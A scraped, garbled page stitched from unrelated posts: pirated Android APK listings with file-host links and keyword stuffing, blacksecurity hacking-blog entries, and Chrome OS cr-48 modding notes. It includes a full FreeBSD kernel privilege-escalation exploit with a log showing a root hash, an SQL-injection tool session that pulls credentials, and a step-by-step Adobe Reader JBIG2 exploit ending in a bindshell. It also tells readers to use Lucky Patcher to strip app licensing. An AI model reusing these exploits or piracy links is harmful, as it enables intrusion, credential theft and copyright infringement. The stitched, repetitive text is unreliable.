Flow Powered 1.2 APK

To contact us Click HERE

Flow Powered v1.2 APK Free 4shared Mediafire Download Android

Requirements: Android 2.3.3 or higher
Overview: Flow Powered by Amazon is an augmented reality app that lets you discover information about everyday products around you.

With Flow you can identify tens of millions of products, including books, DVDs, and packaged household items like a box of cereal or a box of tissues.
To get started, point your Flow Powered v1.2 APK Free 4shared Mediafire Download Android camera at
- Book covers
- Video games
- DVDs & CDs
- Packaged goods like games and toys
- A box of cereal.
Flow will also decode
- UPC barcodes
- QR codes.
Flow uses A9.com's continuous scan technology to automatically recognize items available on Amazon.com, and overlay product information using augmented reality.
Once you launch the app, aim your camera Flow Powered v1.2 APK Free 4shared Mediafire Download Android towards the items you want to identify. Flow will begin recognizing items immediately. Move your phone from one product to the next, and information is automatically delivered to the screen. For some products, media previews, like audio clips or video clips can be viewed almost instantly.
If you want to learn more about a given item, or find out about related items, or read customer reviews, tap on the product information preview that appears on the screen. You can also share product details with friends via email, or Twitter, or make purchases on Amazon.com.
Flow’s app menu lets you trigger its History, among other features, giving you access to all your scanned items, sorted by date, product category, item name, or scan type.
Flow Powered v1.2 APK Free 4shared Mediafire Download Android

Download here

http://www.filehost.ws/3ojgokoidpne

Direct Download

http://depositfiles.com/files/6i6jumx78

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

BeNaughty 2.8.16 APK

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

EasyProfiles (Pro) 4.7.8 APK

To contact us Click HERE

EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up , Lucky patcher
Overview: Define profiles and switch between them both manually and automatically.

Profile Attributes are:

WIRELESS CONTROLS
- Airplane mode
- Bluetooth
- GPS* *G
- Wifi
- AutoSync
- background data *R
- data roaming *R
- Mobile network* *G(Attention EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android Froyo users: You have to enable mobile data connection in the system settings, before EasyProfiles is able to switch it!)
- Radio (toggles only phone/SMS connection) *G
- APN settings
- 2G/3G/4G switch *R (GSM only!)
- 4G / WiMAX*
- Hotspot*

DISPLAY
- Automatic screen brightness
- Screen brightness
- Display timeout
- AutoRotate
- Wallpaper(Animated EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android wallpapers only *R!)
- patternlock switch *R

SOUND
- Ringer mode
- Ringer volume
- Notification vibration
- Notification volume
- System volume
- Media volume
- Speaker mode (use phone as hands free device)
- Ringtone
- Notification tone
- Sound effects
- Haptic feedback
- Dtmf tone when dialing

ADVANCED FEATURES
- Ringer group exception*
(You may define contact groups EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android and add all persons to it that need exceptional handling. I.e. all incoming calls that belong to one of the specified groups are suppressed, if the ringer is on. And vice versa if the ringer is off, these calls are indicated by normal ringer sounds.)
- SMS group exception* (Same as Ringer group exception, but this attribute considers SMS instead of calls.)
- Suppress individual contact ringtones*
- Screenlock*
- Automatically Answer Calls
- HTC Scene*
- Preferred Input Method *R
- Ringer Volume lock

Automatic Profile Switches based on:
- Time
- Weekday
- currently activated profile
- detected/missing Motion
- Bluetooth connection/disconnection
- Wifi connection/disconnection
- Headphones (plugged in/out)
- Battery Level
- Charging state
- Calendar Entry* (with keywords)
- Activation Time (limit waiting for another event to specified time, then fire independently)
- Location (based on mobile phone EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android cells or visible wifi hotspots or GPS)
- Car / Desk Docking station
- Foreground Application (upon start or stop)

Additionally define actions on events and/or profile (de-)activation:
- Start Application
- Stop Application* (not available on FROYO)
- Notify (Notify yourself on an event)
- Send SMS
- Call a number (enables call forwarding)
- Locale Plugin Setting (use all "locale" plugins also in EasyProfiles!)
- Reboot *R
- Execute shortcut (Especially in combination with GScript this becomes a very powerful extension!)

Additionally EasyProfile itself is able to act as a locale settings plugin, so you can switch profiles also from other apps (like e.g. tasker).

* These features use non-public API or hidden functions. It is possible that some of them do not work on every combination of device and android version.
It is possible that they then do not work as expected or at all. There is no garantee that they will work on future android versions.

*G These features are not available on unrooted devices using android 2.3 or later.

*R These features are only EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android available on rooted devices.

We have no possibility to answer on comments at the market. Please send an email if you have an issue. We will then help to find the reason.

Read more details and changelog on http://SmartDyne.de/easyprofiles

Note: Use Lucky Patcher to remove license verification

What's in this version:
4.7.8:
Fixed issue with volume lock on ICS and splitted volumes
Fixed issue regarding endless volume toggle loop
Improved simplified chinese, french and spanish translations

EasyProfiles (Pro) v4.7.8 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/2u53h4qwcuv2/EasyProfiles__Pro__v4.7.8.zip.html

Direct Download

http://rapidgator.net/file/22914316/EasyProfiles_(Pro)_v4.7.8.zip.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Android Voice Xtreme 2.19 APK

To contact us Click HERE

Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: The only voice interface you'll need AVX is the most full featured virtual assistant for Android !



Who should use AVX? If you are Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android looking for an application that provides hands-free operation of your phone to open apps, read and reply to text messages and email, schedule calendar events and many more functions that you can perform using just your voice then AVX is right for you.

If you are just looking for an electronic friend to chat with then please go with one of the Siri clones. On the other hand if you want a real virtual assistant that has useful functions that will make your life easier then please give AVX a try.

AVX has all the functions you'd expect your assistant to perform plus some that you probably never new were possible. Here is a list of some of the functions that you wont find in most of the competition:

Features:
Reading and replying to incoming text and email including Microsoft Exchange
Integration with Evernote
Home Automation with INSTEON. Turn Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android on the lights and appliances, open the garage door and a whole lot more, all with voice commands or scheduled or based on your location.
Location based reminders. Remind you to do something based on your location.
Location based actions. Perform any function that AVX can do based on your current location. Have AVX automatically text your wife when you leave the office.
Time based actions. Perform any function that AVX can do on a set day and time
In car mode including wake up phrase
Custom voice shortcuts to your phone applications. Give your apps any name you want and open them using that name.
Voice bookmarks to your favorite web sites. Give your bookmarks any name you want and open them using that name.
Activate just by shaking your phone
Works with all Bluetooth Headsets

What's in this version:
Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android
*BLUETOOTH AND WAKE MODE IMPROVEMENTS
*NEW MESSAGING FEATURES (NEW VIDEO)
*INTEGRATION WITH TASKER (NEW VIDEO)
*QUICK START HELP MENU
*HANDS-FREE READ AND REPLY TO FACEBOOK FEED. SEE VIDEO
*SPEAK AND PROMPT MESSAGE MODE
*IMPROVED SCREEN LOCK/WAKE WITH PROFILES
*CLEANER SETTINGS LAYOUT
*NEW VIDEO FOR USING PROFILES
*NEW SETTINGS PROFILES
*EVERNOTE INTEGRATION
*MICROSOFT EXCHANGE INTEGRATION
*LOCATION BASED ACTIONS, REMINDERS

Android Voice Xtreme v2.19 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/6l92kmd9tkoe/Android_Voice_Xtreme_v2.19.apk.html

Direct Download

http://rapidgator.net/file/22901533/Android_Voice_Xtreme_v2.19.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Textgram Pro 1.79 APK

To contact us Click HERE

Textgram Pro v1.79 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up
Overview: Create beautiful graffiti and share them with your friends on Facebook, Instagram, Whatsapp, Streamzoo, etc.. or save them in your gallery.



** Pro Features **
* Text Rotation
* Frames
* No Ads

Create beautiful graffiti and share them with your friends on Facebook, Instagram, Whatsapp, Streamzoo, etc.. or save Textgram Pro v1.79 APK Free 4shared Mediafire Download Android them in your gallery.

What's in this version:
__ v1.79 __
* Store is now working, you can get many extra free backgrounds and fonts.
Textgram Pro v1.79 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/nhlmyuhscwof/Textgram_Pro_v1.79.apk.html

Direct Download

http://rapidgator.net/file/22899093/Textgram_Pro_v1.79.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

ZPlayer 3.2.03 Build 105 APK

To contact us Click HERE

ZPlayer 3.2.03 Build v105 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 and up
Overview: Windows Phone 7 / Zune themed media player for Android OS.
you might need to uninstall the application before upgrading to version 3.x some database changes have made the application crash after upgrading, but a new installation (or clearing application data) should fix the issue.

Welcome to ZPlayer a Windows Phone 7 / Zune themed player, a better richer and more interactive media player.
Get album reviews, artist biographi

Now with more widgets, fast ZPlayer 3.2.03 Build v105 APK Free 4shared Mediafire Download Android forward and rewind controls, headset controls home screen customization, equalizer, audio effects. You can start with your own media, and learn about other artists, other tracks and what other people are listening too. Pair this media player with a last fm account and submit likes, now playing status, and scrobble tracks.

*note The Application uses android framework Audio Effect API, this API was introduced since android 2.3. Therefore only devices that have at least Android version 2.3 will be able to take advantage of this feature.

++ if you use a third party equalizer ZPlayer 3.2.03 Build v105 APK Free 4shared Mediafire Download Android that controls the output mix for all media playing on the device, disable it before using this application. This application needs to control its own audio effects.

-audio effects implemented include Equalizer, Bassboost and Virtualizer based on Android 2.3

What's in this version:
bug fixes
Android 4.1 support

ZPlayer 3.2.03 Build v105 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/zl8j1p2onesm/ZPlayer_v3.2.03_Build_105.apk.html

Direct Download

http://rapidgator.net/file/22895435/ZPlayer_v3.2.03_Build_105.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

FreeBSD Local Root Privilege Escalation Vulnerability Hits Like a Ton of Bricks

To contact us Click HERE

We've been following the recent FreeBSD Security Advisory http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc . This vulnerability allows us to write data within kernel memory itself. Nice work to Don and the original discoverer, Christer Oberg.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

uname -rs
FreeBSD 7.0-RELEASE
id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
cc -o x x.c
./x 0xc0bf26b8
euid=0
id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh


Happy holidays, all!

D
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAklUla4ACgkQttfe3HwtctN/fgCeJDmmpOK8bn1dnssxOkTZXdUg
idUAmwdyoMZnoEfnrR14TQlRDli9mv+j
=Pixh
-----END PGP SIGNATURE-----

/*
 * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
 * defined here: 
 * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
 *
 * This will overwrite your credential structure in the kernel. This will 
 * affect more than just the exploit's process, which is why this doesn't
 * spawn a shell. When the exploit has finished, your login shell should
 * have euid=0. 
 *
 * Enjoy, and happy holidays!
 *  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
 */

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
 struct proc * p = (struct proc * )PATTERN1;
 uint * i;

 while(1)
 {
  if(p->p_pid == PATTERN2)
  {
   i = (uint * )p->p_ucred;
   *++i = 0;
   break;
  }

  p = p->p_list.le_next;
 }

 return 1;
}

int
main(int argc, char * argv[])
{
 ulong addr;
 uchar * c;
 uchar * d;
 uint * i;
 void * v;
 int pid;
 int s;

 if(argc != 2)
 {
  fprintf(stderr, "usage: ./x <allproc>
");
  return 1;
 }

 addr = strtoul(argv[1], 0, 0);

 v = mmap(
  NULL,
  (PAGES*PAGE_SIZE),
  PROT_READ|PROT_WRITE|PROT_EXEC, 
  MAP_ANON|MAP_FIXED, 
  -1, 
  0);
 if(v == MAP_FAILED)
 {
  perror("mmap");
  return 0;
 }

 c = v;
 d = (uchar * )x;
 while(1)
 {
  *c = *d;
  if(*d == 0xc3)
  {
   break;
  }

  d++;
  c++;
 }

 *c++ = 0xc3;

 c = v;
 while(1)
 {
  if(*(long * )c == PATTERN1)
  {
   *(c + 0) = addr >>  0;
   *(c + 1) = addr >>  8;
   *(c + 2) = addr >> 16;
   *(c + 3) = addr >> 24;
   break;
  }
  c++;
 }

 pid = getpid();
 while(1)
 {
  if(*(long * )c == PATTERN2)
  {
   *(c + 0) = pid >>  0;
   *(c + 1) = pid >>  8;
   *(c + 2) = pid >> 16;
   *(c + 3) = pid >> 24;
   break;
  }
  c++;
 }

 s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
 if(s < 0)
 {
  perror("socket");
  return 1;
 }

 shutdown(s, SHUT_RDWR);

 return 0;
}

back on a mission and ready to ride

To contact us Click HERE
So we have decided to bring the blogs back for a bit to let some of our members post to. There's been alot of activity over the since the holidays have ended. Were currently looking into alternative heap spraying techniques that don't utilize java, in the process of researching several MS vulns (namely ms09-001 atm), and have been doing a bit of reversing to make some security software play nice.

More post coming soon - xort

A race for MS09 (001) ... get ready for inet crime!

To contact us Click HERE
An update on our analysis of MS09-001's patch provided in KB958687. The patch fixes a vulnerability in Microsoft's SMB handling code. An unauthenticated attacker can connect to a host on a local LAN over SMB or utilize DCERPC/SMB over the internet in order to access a vulnerable host.

We have spent the past day looking into what exactly was patched and have determined that the patch fixes 5 functions in srv.sys that can theoretically lead to remote execution of code (This has yet to be confirmed - nor debunked...).

The functions patched in srv.sys are:

SrvSmbWriteMpx()
SrvIpxServerDatagramHandlerCommon()
SrvSmbWriteRaw()
SrvSmbWriteAndX()
SrvSmbOpen()

Our group has already produced functioning code that can in part trigger these functions in the manner that is needed to trigger the (3) vulnerabilities discussed in the zeroday initiative's advisories. Trans/Trans2 here we come :D

The funny thing is, no-one else seems to have posted any information on this or is really getting close to exploiting this in the public domain. Whats the deal? Well - blacksec will have to keep ya' updated with the juicy details while the girls catch up eh?

-xort/bannedit-

Str0ke @ Milworm's Funeral is This Friday

To contact us Click HERE
Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

rip str0ke

MS09-001 followup - Just DoS bugs?

To contact us Click HERE
It appears that the 3 vulnerabilities convered in MS09-001 due not lead to code execution. We spent the last few days really tearing into these and could not produce any conditions that were controllable that would lead to code execution. The ANDX bug had already been determined to be simply a DOS but it was thought that the NTTRANS/TRANS2 bugs could lead to code execution. Opon further review, we found that in the case of both bugs, a buffer underflow could be caused in which a buffer would be allocated with not enough memory which would later be zeroed out later in the SMB processing functions of transaction requests. It was here that the now corrupted system heap pool would crash in srv.sys during a pool-bugcheck. The crashs can actually be triggered a number of ways - leading to a similiar crash - just with different origins. Were still looking into possible avenues of taversing the MPX functionality but as for now... code execution does not look possible.

Think the group will try to spend some time this week looking at other possible vulnerable functionality in SMB. Seems like there is alot of room for error.

-xort

MsSQL SQL Injection Data Crawling - Tool Updated

To contact us Click HERE
We've recently updated the functionality of the sqlidiscover.pl tool used for enumerating sql databases, tables, columns and data fields. We've included support for adding a custom cookies to your request.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin

Blinded w/ VNC Viewer vulns.

To contact us Click HERE
Well, a few things to report here in the blackbl0gs. Firstly, I've spent the past few days looking into/writing exploits for these recent VNC viewer vulns in the RFB protocol. The first vulnerability affects Real VNC viewer <=4.1.2 (CVE-2008-4770). This vulnerability is triggered when incorrect information is passed to CMsgReader::readRect() which can lead to an integer underflow in allocation space. The remaining data in the packet following the allocation size is then copied into the buffer allocated on the stack leading to an SEH overwrite. The second vulnerability which were currently looking into accurately exploiting is a vulnerability in TightVNC <=1.3.9 (CVE-2009-0388). In this vulnerability malicious data can be passed to a Tvnc subfunction in which a null byte overwrite can be triggered via a integer over/underflow @ HeapPointer + ControllableValue. Lotsa fun other hacks going in the priv8 arena.

ttfn, -xort

Adobe Acrobat/Reader Universal Exploit : APSB09-01 (aka CVE-2009-0658)

To contact us Click HERE
Hey gang,
Been a few days since our last post, but not to worry! Still lots of fun stuff happening in the blacksec community. Our latest post is a brief analysis of the jbig2 vulnerability recently patched by Adobe in APSB09-01 (aka CVE-2009-0658). What I thought was particularly interesting (although not a surprising given vendors actual understanding of the vulnerabilities that typically affect their software) was its classification: "Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat". The actual bug stems from a pointer-indexing issue when utilizing a specifically crafted JBIG2 structure.

Bugs like this are fun, because they can often lead to multiple different avenues that inturn can be leveraged for execution. We were able to gain control of execution through the use of some careful heap spraying that would both create 1/2 a sprayed area of pointers that are later loaded and used in a controlled write operation followed by another 1/2 of your typical nopsled/shellcode heapspraying. Combine this spraying with the time used to allocate the memory being used and

you could easily overwrite low-addressed (static) module entry points. Theres a little more too this, so lets dig in...

Lets begin with the orignal crash mentioned in the snort VRT blog posting (http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html). From the posting:

"the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33"

Here, we can see the beginning of our long road to exploitation. After modifying the segment header flag of our JBIG2 stream, we are able to embed a controllable (big endian!) pointer beginning at the 2nd byte following the the segment header flag. Using the values described in the original advisory, we can trigger a crash at the first (0387298A - Add operation) location as seen below.

03872979 |. 8B41 1C MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
0387297C |. 85C0 TEST EAX,EAX
0387297E |. 0F84 AC020000 JE Acroba_1.03872C30
03872984 |. 8B4E 10 MOV ECX,DWORD PTR DS:[ESI+10]
; The base-index register gets loaded into ECX
03872987 |. 8D0480 LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
0387298A |. 834481 EC 01 ADD DWORD PTR DS:[ECX+EAX*4-14],1
; ECX+ EAX*4 - the value at this location gets incremented.

Here ECX varies in its exact location but, generally lands in the ~02xxxxxx range. If we craft some generic heap spraying code, we can allocate blocks of memory within a specified distance of this pointer. So, after adding the heap spraying code we can see a nice area of memory that gets allocated 0x082xxxxx-0x0fexxxxx bytes (or 0x6200000 to 0xDE00000 bytes away). This area is located after Cooltype and before acaptuse in memory. If we look back at the assembly from the first crash area we can see our pointer gets multiplied by 5 first and then multiplied by 4 again in the following operation (you'll see below this same logic is repeated in the second crash). Applying this logic, if we use a value such as 0x00666666, it will first be multiplied by 5 to give us 0x01FFFFFE and then multiplied by 4 again to finally equal 0x07FFFFF8. This drops us right in the middle of our first large heap sprayed area and allows us to continue on to the second crash location.

03872BC7 |> 8B0CBB /MOV ECX,DWORD PTR DS:[EBX+EDI*4]
03872BCA |. 8B41 1C |MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
03872BCD |. 8B56 10 |MOV EDX,DWORD PTR DS:[ESI+10]
; EDX points to the same base we used before in ECX
03872BD0 |. 8D0480 |LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
03872BD3 |. 8D4482 EC |LEA EAX,DWORD PTR DS:[EDX+EAX*4-14]
; the address of where we performed our last ADD at the first crash location gets
; loaded into EAX
03872BD7 |. 8B50 04 |MOV EDX,DWORD PTR DS:[EAX+4]
; HEAPSPRAY_AREA+0x4 gets loaded into EDX
03872BDA |. 85D2 |TEST EDX,EDX
; make sure this isn't 0!
03872BDC |. 74 0A |JE SHORT Acroba_1.03872BE8
03872BDE |. 8B68 10 |MOV EBP,DWORD PTR DS:[EAX+10]
; HEAPSPRAY_AREA+0x10 gets loaded into EBX
03872BE1 |. 890CAA |MOV DWORD PTR DS:[EDX+EBP*4],ECX
; a pointer to our struct gets written to anywhere we want

Here, we crash at the second location with the values EDX and EBX equaling 0x90909090. Basically, we can overwrite any portion of (writable) memory with a pointer to our struct. We accomplish this by making the first 100-300 of our heap spray operations (of typically 1000) with [x][y][x][y][x][y][x][y] style alternating pointers where x is the value we want to overwrite and y is 0 (used in EBX*4). Other values can be used here but you get the general idea.

Lets focus now on whats at the pointer were able to write to anywhere in memory.

This is our stream from our file:

stream.....@.........,...H...........
73 74 72 65 61 6D 0A [00000001] 40 00 00666666 [13000007] 2C 00 00 09

Certain bytes have been separated and put into brackets to help visualize their exact locations when loaded into memory.

When the second crash occurs ECX points to the following memory data:

010B60F0 [01 00 00 00]00 62 01 00 00 00 2F 44 00 00 75 6D
....b
.../D..um
010B6100 00 00 00 00 25 32 30 61 6E 64 25 32 F4 FF FF FF ....%20and%2ôÿÿÿ
010B6110 [07 00 00 13]00 00 72 75 62 D0 A2 01 0C 6B BA 00 ....rubÃ�¢
.kº.


As you can see, we control the 2 (little endian) pointers at [ECX] and [ECX+0x20] and can place whatever values we wish at these locations by manipulating the stream in our malformed pdf. Our Solution was to simply place a "CALL [ECX+0x20]" at the first location where we land at (after overwriting a called pointer) and to stick where ever we want to land at [ECX+0x20] (or right after our index pointer in our jbig2 stream).

So, what to overwrite? We spent a day or two looking for static areas of memory that were to be accessed after the crash that would lead to execution. In the end, we decided to take advantage of the Module Entry point of kernel32 located in the 0x00251xxx range. These locations will vary based on SP/pdf you have created but after a little math can be statically calculated.

00251FD8 7C800000 kernel32.7C800000
00251FDC 7C80B63E kernel32. ; <- what we clobber!
00251FE0 000F6000
00251FE4 00420040 Acrobat.00420040
00251FE8 00251F70 UNICODE "C:\WINDOWS\system32\kernel32.dll"
00251FEC 001A0018
00251FF0 00251F98 UNICODE "kernel32.dll"
00251FF4 80084004

This is called not to long after our heap spraying has completed and our overwrite has succeeded. This leaves only one last step, to toss your fav high mem address into ECX+0x20. We chose to use something simple, 0x13131313 - which lands in the second portion of our heap spraying code. This technique works both on acrobat/reader 9 with the same offsets :D:D:D. One, two, twenty-three, four...adobe bindshell landing at your door.

C:\Documents and Settings\Administrator\Desktop> telnet localhost 5500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Bindshell Exploit

- xort & redsand

Str0ke @ Milworm's Funeral is This Friday

To contact us Click HERE
Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

rip str0ke

Pixlr-o-matic 2.1.2 APK

To contact us Click HERE

Pixlr-o-matic v2.1.2 APK Free 4shared Mediafire Download Android

Requirements: Android 2.1 or higher
Overview: You can add fun retro effects to your photos in a snap and transform your photos into cool looking vintage images. Editing is as easy as one, two, three with Pixlr-o-matic to add effects, overlays and borders. So many options to choose from, there are more than 5,000,000 possible finishes to Pixlr-o-matic v2.1.2 APK Free 4shared Mediafire Download Android make your photos look spectacular!


Features:
✓Color overlays help you adjust the mood – amplify the tone, cool it down, or add surreal shades
✓Lighting effects add drama, sparkle or a grunge look
✓Finish off your photo process with the right frame – pick a border style that fits you
✓Want it all in a single swipe? Try the randomizer and we’ll select an effect, overlay, and border for you.
✓No camera required! Select a photo from Pixlr-o-matic v2.1.2 APK Free 4shared Mediafire Download Android your gallery and start applying effects. If your device has a camera, you can also snap a new picture from within the app
✓Share your vintage image directly with your friends through Facebook or imm.io
✓Export your finished image back to your gallery. Images can be saved in high resolution, depending on the resolution of the original image
Pixlr-o-matic v2.1.2 APK Free 4shared Mediafire Download Android

Download here

http://rapidgator.net/file/22883274/Pixlr-o-matic_2.1.2_app_.APk.rar.html

Direct Download

http://1hostclick.com/vgx6c3uum6ko/Pixlr-o-matic_2.1.2_app_.APk.rar.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Notes

To contact us Click HERE
**You need to be somewhat versed in Linux for any of these mods.

**You need to have full shell access to use any of my tidbits here, whether this is by developer mode (which is what I did), or some other method you come up with.
While I could go and dual-boot the cr-48 into Ubuntu, I picked to leave the Chrome OS, and modify it to make it more shell friendly.

**You also need to make the root partition writable, and turn off boot verification.

sudo /usr/share/vboot/bin/make_dev_ssd --remove_rootfs_verification
sudo reboot

Then:

sudo mount -o remount,rw /
sudo mount -o remount,exec /mnt/stateful_partition

You will also need to re-run these commands after every reboot, so you may want to stick them in a shell script.


I'd like to get a full build system on it, but I'm not sure if that's possible yet.
I'm also working on getting java and acrobat support into the browser.

Installing the Nano text editor

To contact us Click HERE
I've discovered that the stock cr-48 setup can use binary packages from Arch Linux. This is how to install the Nano editor from arch. I'll provide two different methods, depending on if you want to pull the package from the repository yourself, or use my repackaged binary.
**You need to follow the instructions in the Notes post first, to make the partitions writeable
* Installing from an Arch repo. You'll need to download the package to a linux machine of your choosing. You can find the package at: http://www.archlinux.org/packages/core/i686/nano/
The package is compressed as a .tar.xz, which eluded me for the longest time.To extract the package use XZ Utils on LinuxThe syntax is: xz -d filename
Once you have decompressed the file from it's .xz container, you will be left with a .tar file, which the cr-48 has tools to open.
Now we need to get the file to the CR-48.If you have a ssh server on your linux box, we can use sftp to retrieve the filesftp user@host If you don't have an ssh server, you can upload the file to some public webspace, and wget the file from the cr-48
Once the file is on your cr-48, you can tar -xvf it, and copy the nano exec from the bin directory into /usr/bin (which is in the path) and nano should run flawlessly.


** If you don't want to go through all that work, open up a shell on the cr-48, and wget http://www.calliesfarm.com/chromeos/nano.tar.gz then, tar -zxvf nano.tar.gz and move the nano exec to /usr/bin

Installing Locate

To contact us Click HERE
Installing Locate**You need to follow the instructions in the Notes post first, to make the partitions writeable
I'm only going to give you the simple method for this one, as it has many files that need to be put in different directories
Open up a shell on the cr-48, and sudo suwget http://www.calliesfarm.com/chromeos/locate.tar.gz mv locate.tar.gz / cd /tar -zxvf locate.tar.gz rm -rf locate.tar.gzafter it's installed, you should be able to runupdatedbto populate the database, and it should add a cron job to auto update the db daily

Installing a VNC Viewer

To contact us Click HERE
WooHoo! Finally managed to wrangle a VNC Viewer onto this thing, I'm psyched.

There's an app in the webstore for VNC to a remote server, but that's not really suited for logging in to another machine on the local network.

I've coaxed java to work locally, and am able to run a java vnc client applet.

Still can't get the java plugin to work in browser however.

Detailed directions to follow in a bit

Installing a VNC Viewer, part 2

To contact us Click HERE
Installing VNCViewer
**You need to follow the instructions in the Notes post first, to make the partitions writeable

Open up a shell on the cr-48, and

sudo su
mkdir /mnt/stateful_partition/opt (if you haven't already)
cd /mnt/stateful_partition/opt
wget http://www.calliesfarm.com/chromeos/java.tar.gz
wget http://www.calliesfarm.com/chromeos/vncviewer.tar.gz
tar -zxvf java.tar.gz
tar -zxvf vncviewer.tar.gz
rm -rf java.tar.gz vncviewer.tar.gz
ln -s /usr/bin/java jre1.6.0_23/bin/java
mv vncviewer/vncviewer /usr/bin

after it's installed, you should be able to run

